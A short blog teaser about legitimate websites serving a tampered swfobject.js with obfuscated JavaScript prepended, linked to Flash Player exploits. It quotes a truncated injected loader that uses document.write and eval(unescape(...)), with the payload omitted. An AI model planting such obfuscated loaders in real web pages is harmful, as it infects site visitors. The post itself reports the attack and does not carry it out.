Flash Player vulnerabilities, Poisoned Websites and Virtual Machines
The sites I first saw it mentioned on Slashdot earlier this year but I only experienced it a month ago. Legitimate websites, with “infected” javascript. For example, it’s the standard swfobject.js but with a long line of obfuscated code at the beginning, looking like this: document.write(‘<script language=”javascript”>$=”%64b%3d%22%3c7`7%3c [lots of code deleted] %3b”;eval(unescape($));document.write($);</script>’); What it does [...]
Full Story